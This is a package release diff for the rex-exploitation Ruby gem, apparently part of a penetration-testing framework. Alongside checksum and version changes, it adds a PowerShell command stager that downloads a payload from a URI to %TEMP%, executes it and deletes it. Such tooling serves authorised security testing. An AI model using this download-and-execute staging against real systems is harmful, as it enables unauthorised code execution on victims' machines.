rex-exploitation 0.1.23 → 0.1.24

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 1a5500cc4bbfeadf5f639acf5fb318beb333658fc056baf5368845c2e8896bc0
-  data.tar.gz: e9460ae7a74e37ec17c87a23d6c4b27ff6afdfd6c3e66bcd27c1a33f937660f1
+  metadata.gz: 7e7f58559246a695c82c7e75987d387012f51bc3b96ef997ae3ba2b681386892
+  data.tar.gz: 99ba7aa87ca714dad9afff9d6a0148c50db03fe2267360ee628b8514aebfb8ac
 SHA512:
-  metadata.gz: fa3ed2418c0352fcf1e81fcc4a264e6b782566a91f8ab70cb8b3c5733bec3b4ea43d74c11c26ca49741a3cb471027f87dc2ce1b0b862070c491f546afaeae51d
-  data.tar.gz: c18d56b987ce28b461c74e2e97b5ad569704da5a254f4dbdfe9a1d4ff92dfb79221ee04150b873f74bfdb7b05bdacd2b6492b1b44301067111c4a606baa31a9f
+  metadata.gz: cf0de782ca24c14ff1e2289abdb10d0132fa8d25b234bd4cb360c894a0a5c8025d76e94dc2198bb38af21e97b9a2a376d53a5e26e6db85f4432bab884b2edf3a
+  data.tar.gz: 9e9130b9e5ffd85aed30315a2a98249491a7b88d0f215171bc963a967bf77540ef5fb95040eb3436eee1a232bfecf1fd5460e0314e6972edb9b4e52f1011d684

data/lib/rex/exploitation/cmdstager.rb

@@ -12,4 +12,5 @@ require 'rex/exploitation/cmdstager/printf'
 require 'rex/exploitation/cmdstager/wget'
 require 'rex/exploitation/cmdstager/curl'
 require 'rex/exploitation/cmdstager/fetch'
-require 'rex/exploitation/cmdstager/lwp-request'
+require 'rex/exploitation/cmdstager/lwprequest'
+require 'rex/exploitation/cmdstager/psh_invokewebrequest'

data/lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb

@@ -0,0 +1,46 @@
+# -*- coding: binary -*-
+
+class Rex::Exploitation::CmdStagerPSHInvokeWebRequest < Rex::Exploitation::CmdStagerBase
+
+  def http?
+    true
+  end
+
+  def user_agent
+    /WindowsPowerShell/
+  end
+
+  def generate(opts = {})
+    if opts[:payload_uri].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
+    end
+
+    opts[:temp] ||= '%TEMP%'
+    opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
+    @payload_path = "#{opts[:temp]}\\#{opts[:file]}"
+
+    super
+  end
+
+  def generate_cmds_payload(opts)
+    # NOTE: This requires PowerShell >= 3.0
+    cmd = "Invoke-WebRequest -OutFile #{@payload_path} #{opts[:payload_uri]}"
+
+    # TODO: Craft a better command line, probably with encoding
+    ["powershell.exe -c #{cmd}"]
+  end
+
+  def generate_cmds_decoder(opts)
+    cmds = []
+
+    cmds << @payload_path
+    cmds << "del #{@payload_path}" unless opts[:nodelete]
+
+    cmds
+  end
+
+  def cmd_concat_operator
+    ' & '
+  end
+
+end

data/lib/rex/exploitation/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Exploitation
-    VERSION = "0.1.23"
+    VERSION = "0.1.24"
   end
 end

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: rex-exploitation
 version: !ruby/object:Gem::Version
-  version: 0.1.23
+  version: 0.1.24
 platform: ruby
 authors:
 - David Maloney
@@ -263,8 +263,9 @@ files:
 - lib/rex/exploitation/cmdstager/debug_write.rb
 - lib/rex/exploitation/cmdstager/echo.rb
 - lib/rex/exploitation/cmdstager/fetch.rb
-- lib/rex/exploitation/cmdstager/lwp-request.rb
+- lib/rex/exploitation/cmdstager/lwprequest.rb
 - lib/rex/exploitation/cmdstager/printf.rb
+- lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb
 - lib/rex/exploitation/cmdstager/tftp.rb
 - lib/rex/exploitation/cmdstager/vbs.rb
 - lib/rex/exploitation/cmdstager/wget.rb

metadata.gz.sig

@@ -1 +1,3 @@
-��0�x��i},3�'tD�eƄ��QiQ���J�<Ţ��YMˮ��t��{^n���p�����̬$����O�98J5�XZ_̜���=݋�1�r��D����}�LK��I��w��������k��A��)�I[+�l��i���/9#�v=3�f��R��z_�Mv��}=
+����^�Cz
+���6@B�Q�I�.e]����f�� ��V�!{��R�������U#����
+8��jv4d9� d-�B���󗸡$1t3���!�SWrﰏ�'/�y3�'�MBc0`�g����z��Q�6m;�b�w�j'��\�`8]���,bu�?��P�_�8Q"?�z�